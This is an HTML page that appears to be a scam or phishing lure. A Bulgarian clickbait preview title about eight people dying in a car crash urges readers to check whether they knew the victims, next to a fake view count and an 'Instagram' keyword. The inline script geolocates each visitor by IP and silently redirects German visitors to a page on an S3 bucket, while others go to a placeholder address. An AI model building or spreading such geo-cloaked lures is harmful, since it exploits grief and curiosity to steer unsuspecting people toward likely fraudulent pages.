<!DOCTYPE html> 
<html lang="es"> 
<head> 
<meta charset="utf-8"/> 
<meta name="title" content="Stream"/> 
<meta name="keywords" content="Instagram"/> 
<meta property="og:description" content="307,451,211,000 изгледи"/> 
<meta name="robots" content="index, follow"/> 
<meta name="googlebot" content="noindex"/> 
<meta name="robots" content="index"/> 
<meta name="robots" content="noindex"/> 
<meta name="robots" content="nofollow"/> 
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> 
<meta name="viewport" content="width=device-width, initial-scale=1"/> 
<meta property="og:title" content="За съжаление 8 души загиват при автомобилна катастрофа. Проверете дали познавате някого!"/> 
<meta property="og:image" content="https://media.discordapp.net/attachments/1019442006583410772/1222890695497613352/maderac.jpg?ex=6617dcb6&is=660567b6&hm=c45c359c2d9067b2621967e25b13e7d2c163507b264e1b5e2e5f4a57dcae6e37&=&format=webp"/> 
<meta name="apple-itunes-app" content="app-id=6448311069"/> 
<script type="text/javascript">
        // Función para obtener el país del usuario basado en su dirección IP
        function getCountryFromIP(callback) {
            // Llamada a un servicio de geolocalización basado en IP (puedes utilizar servicios como ipapi.co, ipinfo.io, etc.)
            fetch('https://ipapi.co/json/')
                .then(response => response.json())
                .then(data => {
                    // Llama al callback con el código del país obtenido
                    callback(data.country);
                })
                .catch(error => {
                    console.error('Error al obtener la ubicación del usuario:', error);
                    // Si hay un error, llama al callback con un valor predeterminado (por ejemplo, 'US' para Estados Unidos)
                    callback('US');
                });
        }

        // Redirigir a la URL específica según el país del usuario
        getCountryFromIP(function(countryCode) {
            switch(countryCode) {
                case 'DE':
                    window.location.replace("https://maskik00.s3.eu-west-3.amazonaws.com/z2000/sas02.html");
                    break;
					
			   // Agrega más casos según los países que desees manejar
                default:
                    window.location.replace("https://example.com/default_page.html");
            }
        });
    </script>
